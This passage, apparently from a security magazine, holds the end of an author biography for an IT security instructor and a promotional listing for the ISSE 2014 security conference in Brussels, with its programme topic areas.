network security with tasks ranging from policy audit, vulnerability assessment,
mitigation plan implementation, business continuity and others. He holds a Masters
Degree in Information Systems with a specialty on electronic fraud investigation. He
works investigating various cases ranging from corporate misuse of resources,
phishing and wireless intrusion. Jose is also an IT instructor and Microsoft Certified
Trainer teaching courses for both Microsoft and CompTIA certifications and a college
professor at undergraduate and graduate level teaching forensics, networking, wireless
and ethical hacking courses at both EDP University and Interamerican University in
Puerto Rico. Jose is also an active contributor to the ISECOM Hackers High School
project. He holds a Masters Degree in Information Systems with a specialty on electronic fraud
investigation and multiple certifications including A+, Network+, Server+, Security+, MCSA 2000 /
2003 / 2008, MCITP, MCT, OSWP, CIW and others.
Securing Assets Across Europe
14th & 15th October 2014
MCE, Brussels, Belgium
www.isse.eu.com ISSE
2014
Europes leading independent, interdisciplinary
security conference and exhibition
Over the past decade, Information Security Solutions Europe (ISSE) has
built an unrivalled reputation for its world-class, interdisciplinary approach
and independent perspective on the e-security market.
This year, ISSE will take place on 14th & 15th October in Brussels.
Regularly attracting over 300 professionals including government,
commercial end-users and industry experts who will come together for
a unique all-encompassing opportunity to learn, share and discuss the
latest developments in e-security and identity management.
Programme Topic Areas
Trust Services, eID and Cloud Security
European trust services and eIdentity regulation, governance rules,
standardization, interoperability of services and applications, architectures
in the cloud, governance, risks, migration issues
BYOD and Mobile Security
Processes and technologies for managing BYOD programs,
smartphone/tablet security, mobile malware, application threats
Cybersecurity, Cybercrime, Critical Infrastructures
Attacks & countermeasures against industrial Infrastructures; CERT/CSIRT
European & global developments, resilience of networks & services,
surveillance techniques & analytics
Security Management, CISO Inside
CISOs featuring the latest trends and issues in information security, risk
mitigation, compliance & governance; policy, planning and emerging areas
of enterprise security architecture
Privacy, Data Protection, Human Factors
Issues in big data & cloud, privacy enhancing technologies, insider threats,
social networking/engineering and security awareness programs
Regulation & Policies
Governmental cybersecurity strategies, authentication, authorization &
accounting, governance, risk & compliance
For more information visit www.isse.eu.com
In partnership with
@ISSEConference